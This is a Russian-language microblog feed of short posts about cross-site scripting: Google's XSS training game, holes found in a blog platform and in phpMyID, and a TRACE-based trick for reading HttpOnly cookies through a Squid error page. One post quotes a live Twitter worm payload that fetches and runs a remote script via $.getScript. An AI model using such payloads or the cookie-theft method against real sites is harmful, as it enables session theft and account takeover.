Чтобы добавлять сообщения и комментарии, .

@ugnich:
ugnich

Все уже научились эксплуатировать XSS уязвимости на примере игры от Google?
Опасная игра, учит плохому. :)
До какого уровня добрались без подсказок?

@zweipluse:
zweipluse

Я поломал Билайн! goo.gl :)

@Zert:
Zert

Например, gist можно вставлять в бложики с помощью жаваскрипта, но во избежание всякого XSS возможность вставлять произвольный JS убирают. Как быть?

@tushkanin:
tushkanin

Сегодня убедился насколько дырявый psto. Путем несложных манипуляцый нашел 3 XSS уязвимости. Если первая куда не шло — не фильтровались iframe и object в тегах( например <iframe src=google.com <), то последние 2 просто убили — в профиле, вместо имени и в поле About можно вводить все что угодно. Подозреваю что дыр там еще предостаточно — лень дальше колупаться.

@Denver:
Denver

Интересно можно ли напоганить в TextField.htmlText с помощью xss (http://ru.wikipedia.org/wiki/Межсайтовый_скриптинг) ?

@OCTAGRAM:
OCTAGRAM

В phpMyID обнаружился XSS: error_get($return_to, "Invalid identity: '$identity'"); так–то!

@OCTAGRAM:
OCTAGRAM

Поменял–таки в ERR_INVALID_REQ %R на %M %U %P. Судя по Гуглу, я первый заметил такую возможность XSS.

@OCTAGRAM:
OCTAGRAM

Как показало сканирование, действительно, всё не так безоблачно, как казалось. Уязвимости далеко не все оправдываются, но есть некоторые потенциально опасные, и довольно хитровыкрученные: например, cgisecurity.com здесь рассказывается о древнем недосмотре, который позволяет своровать кукис в обход HttpOnly, используя TRACE. Так вот, оказывается, Squid, хоть и не пропускает TRACE и TRACK, но при этом шлёт страничку «Invalid Request», и на этой страничке, вуаля, запрос вместе с заголовками!

@danetnavernoe:
danetnavernoe

Может баян, конечно, но всё равно интересно: skullsecurity.org

@otakuSiD:
otakuSiD

Mitigating Cross-site Scripting With HTTP-only Cookies


msdn.microsoft.com

@zimyand:
zimyand

Самый оригинальный — twitter.com Не наводить! Очень весело конечно. Но блин. теперь у меня в плагин chromebird не заходит из-за этих шутников.

@Sandrem:
Sandrem

Увидел своими глазами действие xss-уязвимости в твиттере.
Обратите внимание от кого мне оно пришло.

Twitter (15:19:49 21/09/2010)
Offline message (21.09.2010 15:15:28)
vkontakte (vkontakte): t.co"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

@mrThe:
mrThe

dl.dropbox.com i lol'd

@mrThe:
mrThe

В уютненьком твиторе весёленький пиздец.
twitter.com

@zimyand:
zimyand

Лол twitter.com

@yumaa:
yumaa

красивая и изящная реализация XSS для UserJS в Opera bit.ly

@xcedz:
xcedz

technicalinfo.net — HTML Code Injection and Cross-site scripting
Understanding the cause and effect of CSS (XSS) Vulnerabilities